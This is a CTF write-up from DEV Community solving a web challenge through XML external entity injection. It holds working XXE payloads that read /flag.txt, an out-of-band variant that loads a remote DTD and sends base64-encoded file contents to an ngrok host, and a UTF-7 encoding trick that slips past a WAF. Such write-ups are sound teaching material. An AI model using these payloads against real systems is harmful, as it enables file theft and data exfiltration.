DEV Community

yudi
yudi

Posted on

Web Exploitation - Final ARACTF 2021 Write Up

Under Development

Website ini sesuai judulnya jadi belum layak untuk dionlinekan ( ͡◉ ͜ʖ ͡◉)

Hint: Do you know about encoding format? How many? If you do let's wrap this challenge

Technical Report

When opening the website suddenly the page is redirected to login.php which is a fake form
Alt Text
so in this case, I use burpsuite to see what's the content of the index.php
Alt Text
There's an interesting javascript function called sendmessage that sends xml to /send.php. The payload should look like this

<?xml version="1.0"?>
<root>
    <name>yudi</name>
    <email>test@test.com</email>
    <message>hello world!</message>
</root>
Enter fullscreen mode Exit fullscreen mode

I also found another interesting link to mybest.php
Alt Text
In that page (mybest.php), I found another hint says /flag.txt
Alt Text

So I guess the xml thing that we see earlier can be used to retrieve file /flag.txt. let's try it using insomnia with this payload

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]>
<root>&test;</root>
Enter fullscreen mode Exit fullscreen mode

result:
Alt Text

But, there's another issue:

  1. I got no output (it's blind)
  2. WAF reject !DOCTYPE !ENTITY !ELEMENT file:// and .php

Then I try the out-of-band (OOB) attack method to load a remote resource.
The payload:

<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY % flag SYSTEM "http://075a05cf94ed.ngrok.io/dtd.xml">
%flag;
%all;
]>
<root>&send;</root>
Enter fullscreen mode Exit fullscreen mode

dtd.xml

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/%file;'>">
Enter fullscreen mode Exit fullscreen mode

then I encoded all the payload to UTF-7 to bypass the WAF.
The final payload:

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4
Enter fullscreen mode Exit fullscreen mode

dtd.xml

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-ENTITY +ACU file SYSTEM +ACI-php://filter/convert.base64-encode/resource=/flag.txt+ACIAPg
+ADwAIQ-ENTITY +ACU all +ACIAPAAh-ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/+ACU-file+ADs'+AD4AIgA+
Enter fullscreen mode Exit fullscreen mode

result:
Alt Text

Alt Text

FLAG: ara2021{ezzz_pz_lemon_sqzzzz}

Top comments (0)

Read next

frankii profile image

Fusing Customer Care with B2B Digital Marketing

Frank Williams -

emre-karac profile image

Elasticsearch, Kibana , Filebeat kullanarak Netflow verileri nasıl takip edilir?

Emre Karac -

satokenta profile image

Understanding GPT-4: How to Access and Utilize OpenAI’s New AI Model

Sato Kenta -

antonmartyniuk profile image

Mastering Exception Handling in C#: A Comprehensive Guide

Anton Martyniuk -